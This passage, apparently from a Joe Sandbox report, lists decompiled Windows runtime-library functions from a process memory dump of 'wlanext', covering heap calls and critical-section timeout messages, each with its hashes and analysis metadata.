                                  • Instruction ID: 796b394135cab1e58c335ac82ce4e1daff4ee4ed1fb6bf79314f6487aef57160
                                  • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                  • Instruction Fuzzy Hash: B6C08C32080648BBC712AE42ED00F057B29E790B60F000020B7040A5B08532EC60D988
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035136CC Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E035136CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L03504620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                  0x035136d2
                                  0x035136e8
                                  0x035136d4
                                  0x035136e5
                                  0x035136e5

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                  • Instruction ID: ccefebc24adbac1d7cf08dcbe215e15bd6f04256f514db53b4e2ee7cecf02a2f
                                  • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                  • Instruction Fuzzy Hash: 40C02BB8160840BBE715DF30DE10F187264F740A31F6C03647320494F0E5299C00D540
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034F76E2 Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E034F76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                  0x034f76e4
                                  0x00000000
                                  0x034f76f8
                                  0x034f76fd

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                  • Instruction ID: c457d86733c377d5e5acf735a8b742da77c9fdbc97733782ad8ab32681e40254
                                  • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                  • Instruction Fuzzy Hash: 6EC08C741412805EFB2AD708CE21B223A64BB08698F4C01ACAB010D6F2D36DB803C24C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034EAD30 Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E034EAD30(intOrPtr _a4) {

				return L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                  0x034ead49

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                  • Instruction ID: 4040ba70e97125330ac00842a1a0c1de83ab34697c0f6074e4db53bb9fc71c2b
                                  • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                  • Instruction Fuzzy Hash: 7EC08C32080248BBC712AA45DD01F017B29E794BA0F000020B6040A6B28932E861D588
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03507D50 Relevance: .0, Instructions: 7COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E03507D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                  0x03507d56
                                  0x03507d5b
                                  0x03507d60
                                  0x03507d5d
                                  0x03507d5d
                                  0x03507d5d

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                  • Instruction ID: f54ca8cc55b2c5cc9907b4900efdd674451ad6ad9dbae95e5280303c45cab5df
                                  • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                  • Instruction Fuzzy Hash: D6B092353019408FCE16DF18C080B1533E8BB48A40B8900D0E400CBA20D22AE9008900
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03512ACB Relevance: .0, Instructions: 5COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E03512ACB() {
				void* _t5;

				return E034FEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                  0x03512adc

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                  • Instruction ID: d54b68d3fb2d358d0a61cf8d432b6774d5252727f39543c611a2e47026b128c9
                                  • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                  • Instruction Fuzzy Hash: B5B01232C11540CFCF02EF40C610B197332FB00750F09449591016F930C228AC01CB40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0357FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E0357FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0352CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03575720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03575720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                  0x0357fdda
                                  0x0357fde2
                                  0x0357fde5
                                  0x0357fdec
                                  0x0357fdfa
                                  0x0357fdff
                                  0x0357fe0a
                                  0x0357fe0f
                                  0x0357fe17
                                  0x0357fe1e
                                  0x0357fe19
                                  0x0357fe19
                                  0x0357fe19
                                  0x0357fe20
                                  0x0357fe21
                                  0x0357fe22
                                  0x0357fe25
                                  0x0357fe40

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0357FDFA
                                  Strings
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0357FE2B
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0357FE01
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                  • API String ID: 885266447-3903918235
                                  • Opcode ID: 99a6af75b4ae04b7a5b0514262249b86c7cc74499ab1b1fa554abcd530deb30e
                                  • Instruction ID: 3d003519ba63ed926a8e8564fce7723cd9e62bfa7da5c78ba75c4dbe9c93dd31
                                  • Opcode Fuzzy Hash: 99a6af75b4ae04b7a5b0514262249b86c7cc74499ab1b1fa554abcd530deb30e
                                  • Instruction Fuzzy Hash: 50F0F636200601BFD6209A55FC02F67BF6AFB85770F240715F6285A1E1EAA2F82096F4
                                  Uniqueness

                                  Uniqueness Score: -1.00%